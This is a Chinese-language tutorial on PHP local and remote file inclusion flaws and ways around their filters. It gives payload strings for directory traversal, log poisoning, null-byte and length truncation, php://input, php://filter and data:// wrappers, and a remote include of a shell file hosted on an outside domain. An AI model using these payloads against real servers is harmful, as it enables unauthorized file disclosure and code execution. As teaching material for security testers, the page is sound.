文件包含介绍

本地文件包含

常见的文件包含漏洞的形式为 <?php include("inc/" . $_GET['file']); ?> 考虑常用的几种包含方式为

  • 同目录包含file=.htaccess
  • 目录遍历?file=.../.../.../.../.../.../.../.../.../var/lib/locate.db
  • 日志注入?file=.../.../.../.../.../.../.../.../.../var/log/apache/error.log
  • 利用/proc/self/environ

其中日志可以使用SSH日志或者Web日志等多种日志来源测试

远程文件包含

触发Sink编辑

如 PHP中:

include

在包含过程中出错会报错,不影响执行后续语句

include_once

仅包含一次

require

在包含过程中出错,就会直接退出,不执行后续语句

require_once

绕过技巧编辑

常见的应用在文件包含之前,可能会调用函数对其进行判断,一般有如下几种绕过方式

url编码绕过

如果WAF中是字符串匹配,可以使用url多次编码的方式可以绕过

特殊字符绕过

  • 某些情况下,读文件支持使用Shell通配符,如 ?* 等
  • url中 使用 ?# 可能会影响include包含的结果
  • 某些情况下,unicode编码不同但是字形相近的字符有同一个效果

%00截断

几乎是最常用的方法,条件是 magic_quotes_gpc 关闭,而且php版本小于5.3.4。

长度截断

Windows上的文件名长度和文件路径有关。具体关系为:从根目录计算,文件路径长度最长为259个bytes。 msdn定义 #define MAX_PATH 260,其中第260个字符为字符串结尾的 \0 ,而linux可以用getconf来判断文件名长度限制和文件路径长度限制。 获取最长文件路径长度:getconf PATH_MAX /root 得到4096 获取最长文件名:getconf NAME_MAX /root 得到255 那么在长度有限的时候,././././ (n个) 的形式就可以通过这个把路径爆掉 在php代码包含中,这种绕过方式要求php版本 < php 5.2.8

伪协议绕过

  • 远程包含: 要求 allow_url_fopen=On且 allow_url_include=On , payload为 ?file=[http|https|ftp]😕/websec.wordpress.com/shell.txt 的形式
  • PHP input: 把payload放在POST参数中作为包含的文件,要求 allow_url_include=On,payload为 ?file=php://input 的形式
  • Base64: 使用Base64伪协议读取文件,payload为 ?file=php://filter/convert.base64-encode/resource=index.php的形式
  • data: 使用data伪协议读取文件,payload为 ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=的形式,要求 allow_url_include=On

协议绕过

allow_url_fopen 和 allow_url_include 主要是针对 http ftp 两种协议起作用,因此可以使用SMB、WebDav协议等方式来绕过限制。

相关推荐
黑客老陈6 小时前
面试经验分享 | 北京渗透测试岗位
运维·服务器·经验分享·安全·web安全·面试·职场和发展
安全方案11 小时前
如何识别钓鱼邮件和诈骗网站?(附网络安全意识培训PPT资料)
网络安全·安全培训
H轨迹H14 小时前
SolidState靶机通关教程及提权
网络安全·渗透测试·靶机·oscp
独行soc15 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
D1TAsec15 小时前
Powercat 无文件落地执行技巧,你确定不进来看看?
网络安全
文大。16 小时前
2024年广西职工职业技能大赛-Spring
java·spring·网络安全
风间琉璃""16 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行17 小时前
【DSVW】攻防实战全记录
web安全·网络安全
安全方案18 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全